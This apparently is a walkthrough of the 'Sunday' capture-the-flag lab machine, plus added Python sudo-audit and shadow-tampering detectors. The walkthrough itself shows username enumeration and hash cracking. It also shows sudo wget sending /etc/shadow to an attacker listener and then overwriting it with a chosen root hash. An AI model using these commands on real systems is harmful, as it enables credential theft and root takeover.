I started on the machine by running Nmap against it:
┌──(root💀kali)-[/home/kali/Documents/sunday]
└─# nmap -p- -sV -sC -O -oN scan 10.10.10.76 --min-rate 1000 --max-retries 5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 08:30 EST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (5).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.64% done; ETC: 08:36 (0:04:16 remaining)
Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 57.03% done; ETC: 08:36 (0:02:22 remaining)
Stats: 0:04:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 80.79% done; ETC: 08:36 (0:01:03 remaining)
Stats: 0:07:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.85% done; ETC: 08:37 (0:00:00 remaining)
Nmap scan report for sunday.htb (10.10.10.76)
Host is up (0.025s latency).
Not shown: 51557 filtered ports, 13973 closed ports
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
40880/tcp open  unknown
44671/tcp open  unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/14%OT=79%CT=7%CU=34844%PV=Y%DS=2%DC=I%G=Y%TM=602927B
OS:D%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=94%GCD=1%ISR=A1%TI=I%CI=I%II=I%S
OS:S=S%TS=7)SEQ(SP=97%GCD=1%ISR=A4%TI=I%CI=I%TS=7)OPS(O1=NNT11M54DNW0NNS%O2
OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O
OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R
OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)

Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 442.61 seconds
We can see that RPCbind, Finger and SSH are running, as well as 2 unknown services on 40880 and 44671. I started by running the finger command against the machine:
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Usernames]
└─# finger @10.10.10.76
Login       Name               TTY         Idle    When    Where
sunny           sunny                 pts/2          Sun 18:03  10.10.16.148
The username sunny was found. I attempted to log in to the Sunday machine via SSH with the username sunny. After a few guesses I discovered that the password Sunday allowed me to log in:
┌──(root💀kali)-[/home/kali/Documents/sunday/finger-user-enum-1.0]
└─# ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1                    1 ⨯
Password: 
Last login: Sun Feb 14 18:03:48 2021 from 10.10.16.148
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$ pwd
/export/home/sunny
Once logged in I did some exploring around the machine and found there was a backup folder in the / directory. This contained the file shadow.backup which included 2 password hashes from the shadow file:
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/backup$
I copied these hashes into a file on the Kali machine called pass.txt, then ran John against it using the rockyou wordlist.
┌──(root💀kali)-[/home/kali/Documents/sunday]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Remaining 1 password hash
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:10 0.66% (ETA: 16:12:53) 0g/s 10928p/s 10928c/s 10928C/s munster1..chambers1
0g 0:00:00:14 0.93% (ETA: 16:12:46) 0g/s 10976p/s 10976c/s 10976C/s shelbourne..marinell
cooldude!        (sammy)
1g 0:00:00:18 DONE (2021-02-15 15:47) 0.05350g/s 10957p/s 10957c/s 10957C/s dompet..bluepen
Use the "--show" option to display all of the cracked passwords reliably
Session completed
From the output, we can see that the password cooldude! was found for the username sammy. I then tried logging into the machine via SSH with the sammy user and the password cooldude!. This was successful and I was able to capture the user flag.
┌──(root💀kali)-[/home/kali/Documents/sunday]
└─# ssh sammy@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Jul 31 17:59:59 2020
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sammy@sunday:~$ ls
Desktop    Documents  Downloads  Public
sammy@sunday:~$ cd Desktop
sammy@sunday:~/Desktop$ cat user.txt
[REDACTED]
I next needed to escalate privileges to root. I ran the command sudo -l to identify if there were any files that could be executed as root without needing to provide a password:
sammy@sunday:/etc$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
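The sudo -l output above is exactly the kind of line a configuration audit should catch before an attacker does. The following Python is an added example, not part of this writeup or of the Sunday machine: it parses sudo -l output (or sudoers text in the same shape) and reports NOPASSWD rules whose command is ALL or a binary able to read and write arbitrary files as the target user. wget is the only such binary listed because it is the one on this page; the list, the names FILE_RW_CAPABLE, parse_sudo_rules and find_risky_rules, and the sample text are my own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Binaries that, run under sudo, let the caller read or write arbitrary files
# as the target user. Only wget (from the sudo -l output on this page) is
# listed; treat this as a starting point for an audit list, not a complete one.
FILE_RW_CAPABLE = {"wget"}

# Matches the rule part of both "sudo -l" output and sudoers lines, e.g.
#   (root) NOPASSWD: /usr/bin/wget
#   sammy ALL=(root) NOPASSWD: /usr/bin/wget, /usr/bin/id
RULE_RE = re.compile(
    r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)"
)


@dataclass
class SudoRule:
    runas: str                 # user the command runs as ("root", "ALL", ...)
    nopasswd: bool             # True when the NOPASSWD tag is present
    commands: list[str] = field(default_factory=list)


def parse_sudo_rules(text: str) -> list[SudoRule]:
    """Extract sudo rules from sudo -l output or sudoers text. Header lines
    such as 'User sammy may run the following commands ...' have no
    parenthesised runas spec and are skipped."""
    rules: list[SudoRule] = []
    for line in text.splitlines():
        m = RULE_RE.search(line.strip())
        if not m:
            continue
        # "(user : group)" -> user; an empty spec means root in sudoers
        runas = m.group("runas").split(":")[0].strip() or "root"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(runas, "NOPASSWD" in tags, cmds))
    return rules


def find_risky_rules(text: str) -> list[str]:
    """Report NOPASSWD rules whose command is ALL or a file read/write capable
    binary. With such a rule the invoking user's password is no longer a
    barrier to rewriting root-owned files such as /etc/shadow."""
    findings = []
    for rule in parse_sudo_rules(text):
        if not rule.nopasswd:
            continue
        for cmd in rule.commands:
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or program in FILE_RW_CAPABLE:
                findings.append(f"NOPASSWD as {rule.runas}: {cmd}")
    return findings


# Sample input: the sudo -l output shown in the writeup.
SUDO_L_OUTPUT = """\
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
"""

if __name__ == "__main__":
    for finding in find_risky_rules(SUDO_L_OUTPUT):
        print(finding)
```

Run against the page's output it reports a single finding, `NOPASSWD as root: /usr/bin/wget`; the same rule without the NOPASSWD tag is not reported, since a password prompt still stands between the account and root-level file writes.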
We can see that the wget command can be run as root without a password. I created a new shadow file on my Kali machine containing a new root hash of my choosing:
I started by generating the new hash:
┌──(root💀kali)-[~/.ssh]
└─# openssl passwd -5 -salt thesalt pass123                                                       1 ⚙
$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3
I then took a copy of the shadow file currently used on the Sunday machine. I did this using wget running as root, by first creating a Netcat listener on kali:
┌──(root💀kali)-[/home/kali/Documents/sunday]
└─# nc -nvlp 80                                                                                   2 ⚙
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Then posting the file from the Sunday machine to my kali listener using sudo wget:
sammy@sunday:/tmp$ sudo wget --post-file=/etc/shadow 10.10.14.15
--02:00:03--  http://10.10.14.15/
           => `index.html'
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 
The listener then captured the POST request carrying the shadow file:
┌──(root💀kali)-[/home/kali/Documents/sunday]
└─# nc -nvlp 80                                                                                   2 ⚙
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.76.
Ncat: Connection from 10.10.10.76:40985.
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.15
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 628

root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I copied the contents of this shadow file to a file on my Kali machine called shadow and modified the root line at the top with the hash I generated with the openssl command, so my root entry looked like the following:
root:$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3:::::::
This shadow file was then hosted via a Python HTTP server and downloaded back onto the Sunday machine, overwriting the original shadow file:
sammy@sunday:/etc$ sudo wget http://10.10.14.15:8000/shadow -O /etc/shadow
--01:59:50--  http://10.10.14.15:8000/shadow
           => `/etc/shadow'
Connecting to 10.10.14.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 628 [application/octet-stream]

100%[====================================================================================================>] 628           --.--K/s

01:59:50 (796.26 KB/s) - `/etc/shadow' saved [628/628]
Once downloaded, I attempted to switch user to root using the password I entered when creating the new hash (pass123):
sammy@sunday:/tmp$ su root
Password: 
sammy@sunday:/tmp# whoami
root
sammy@sunday:/tmp# cd /root
sammy@sunday:/root# ls
overwrite       root.txt        troll           troll.original
sammy@sunday:/root# cat root.txt
[REDACTED]
As you can see from the output, this was successful and I was able to capture the root flag.
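Three steps in this writeup come down to a shadow file moving or changing: the world-readable shadow.backup, the copy of /etc/shadow that arrived on the listener as an HTTP POST body, and the rewritten root entry with its cleared lastchg field. The script below is an added example, not part of the original writeup or of the Sunday machine, written from the detection side: it parses Solaris-style nine-field shadow entries, flags a request body that is a shadow file, lists the accounts an offline cracker could actually target (those with a real hash rather than NP or *LK*), and diffs a current shadow file against a baseline to catch the replaced root hash and the emptied lastchg field. The sample entries are trimmed copies of values shown on this page; the request is constructed to mirror the captured one; all function and constant names are my own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Solaris shadow(4) entries have nine colon-separated fields:
# name:password:lastchg:min:max:warn:inactive:expire:flag
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\s]*(?::[^:\s]*){7}$")


@dataclass
class ShadowEntry:
    name: str
    passwd: str
    lastchg: str   # days since epoch of last change; empty in the tampered entry

    def status(self) -> str:
        """Classify the password field as it appears in this page's shadow files."""
        if self.passwd.startswith("$"):
            return "hashed"        # crypt(3) hash; $5$ is sha256crypt
        if self.passwd == "NP":
            return "no-password"   # Solaris: no password, no password login
        if self.passwd.startswith("*LK*"):
            return "locked"
        return "other"


def parse_shadow(text: str) -> list[ShadowEntry]:
    """Return the well-formed shadow entries in text, ignoring any other lines."""
    entries = []
    for line in text.splitlines():
        if SHADOW_LINE.match(line):
            f = line.split(":")
            entries.append(ShadowEntry(f[0], f[1], f[2]))
    return entries


def crackable_accounts(text: str) -> list[str]:
    """Only accounts with a real hash can be hit by offline guessing; NP and
    locked accounts are skipped by the cracker and can be by the auditor."""
    return [e.name for e in parse_shadow(text) if e.status() == "hashed"]


def http_body(raw: str) -> str:
    """Body of a raw HTTP/1.x request as a listener captures it."""
    _head, sep, body = raw.partition("\r\n\r\n")
    return body if sep else ""


def looks_like_shadow(body: str, min_entries: int = 3) -> bool:
    """Detection heuristic: a request body that parses as several shadow
    entries including root is a shadow file leaving the host."""
    entries = parse_shadow(body)
    return len(entries) >= min_entries and any(e.name == "root" for e in entries)


def audit_against_baseline(baseline: str, current: str) -> list[str]:
    """Integrity check: report a changed hash, a cleared lastchg field, and
    added or removed accounts, by name."""
    base = {e.name: e for e in parse_shadow(baseline)}
    cur = {e.name: e for e in parse_shadow(current)}
    findings = []
    for name, e in cur.items():
        b = base.get(name)
        if b is None:
            findings.append(f"{name}: account added")
            continue
        if e.passwd != b.passwd:
            findings.append(f"{name}: password hash changed")
        if b.lastchg and not e.lastchg:
            findings.append(f"{name}: lastchg cleared")
    for name in sorted(base.keys() - cur.keys()):
        findings.append(f"{name}: account removed")
    return findings


# Constructed samples: a trimmed version of the shadow file seen in the captured
# POST, and the same file with the root line swapped for the openssl-generated
# entry shown on this page.
BASELINE_SHADOW = (
    "root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::\n"
    "daemon:NP:6445::::::\n"
    "dladm:*LK*:::::::\n"
    "sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::\n"
)
TAMPERED_SHADOW = BASELINE_SHADOW.replace(
    BASELINE_SHADOW.splitlines()[0],
    "root:$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3:::::::",
)

# Constructed request mirroring the one the listener captured (Wget/1.10.2).
CAPTURED_POST = (
    "POST / HTTP/1.0\r\n"
    "User-Agent: Wget/1.10.2\r\n"
    "Host: 10.10.14.15\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BASELINE_SHADOW)}\r\n"
    "\r\n" + BASELINE_SHADOW
)

if __name__ == "__main__":
    print("shadow exfil detected:", looks_like_shadow(http_body(CAPTURED_POST)))
    print("crackable accounts:", crackable_accounts(BASELINE_SHADOW))
    for finding in audit_against_baseline(BASELINE_SHADOW, TAMPERED_SHADOW):
        print(finding)
```

Two things are worth noting about the checks. The exfil heuristic keys on structure rather than on the string "shadow", so it also fires on a copy posted from /backup or from a renamed file. The baseline diff reports the replaced root hash and the cleared lastchg field separately, because the second is an artefact of hand-editing a shadow entry that a passwd-driven change never produces, and on its own it is a reason to look at the file.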